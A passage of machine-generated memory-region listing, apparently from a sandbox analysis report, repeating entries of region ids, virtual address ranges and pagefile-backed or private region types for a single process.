0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2704 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2705 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2706 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2707 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2708 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2709 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2710 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2711 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2712 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2713 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2714 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2715 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2716 start_va = 0x2a0000 end_va = 
0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2717 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2718 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2719 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2720 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2721 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2722 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2723 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2724 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2725 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2726 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2727 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2728 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2729 start_va = 
0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2730 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2731 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2732 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2733 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2734 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2735 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2736 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2737 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2738 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2739 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2740 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2741 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 
2838 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 2839 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 2840 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 2841 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 2842 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2843 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2844 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2845 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2846 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2847 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2848 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2849 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2850 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 2851 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2852 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2853 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2854 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2855 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2856 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2857 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2858 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2859 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2860 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2861 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2862 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2863 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 2864 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2865 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2866 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2867 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2868 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2869 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2870 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2871 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2872 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2873 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2874 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2888 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2889 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2890 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2891 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2892 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2893 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2894 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2895 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2896 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2897 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2898 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2899 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2900 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2901 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2902 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2903 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 2904 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 2905 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 2906 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 2907 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2908 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2909 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2910 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2911 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2912 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2913 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2914 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2915 start_va = 0x2a0000 end_va = 0x2b0fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2916 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2917 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2918 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2919 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2920 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2921 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2922 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2923 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2924 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2925 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2926 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2927 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2928 start_va = 0x2a0000 
end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2929 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2930 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2931 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2932 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2933 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2934 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2935 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2936 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2937 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2938 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2939 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2940 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2941 
start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2942 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2943 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2944 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2945 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2946 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2947 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2948 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2949 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2950 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2951 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2952 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2953 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 2954 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2955 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2956 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2957 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2958 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2959 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2960 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2961 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2962 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3064 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 3065 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 3066 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 3067 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" 
filename = "" Region: id = 3068 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3069 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3070 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3071 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3072 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3073 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3074 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3075 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3076 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3077 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3078 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3079 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3080 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 3081 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3082 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3083 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3084 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3085 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3086 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3087 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3088 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3089 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3090 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3091 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3092 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3093 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3094 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3095 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3096 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3097 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3098 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3099 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3100 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3108 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3109 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3110 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3111 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3112 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3113 start_va = 0x2a0000 end_va = 0x2affff entry_point = 
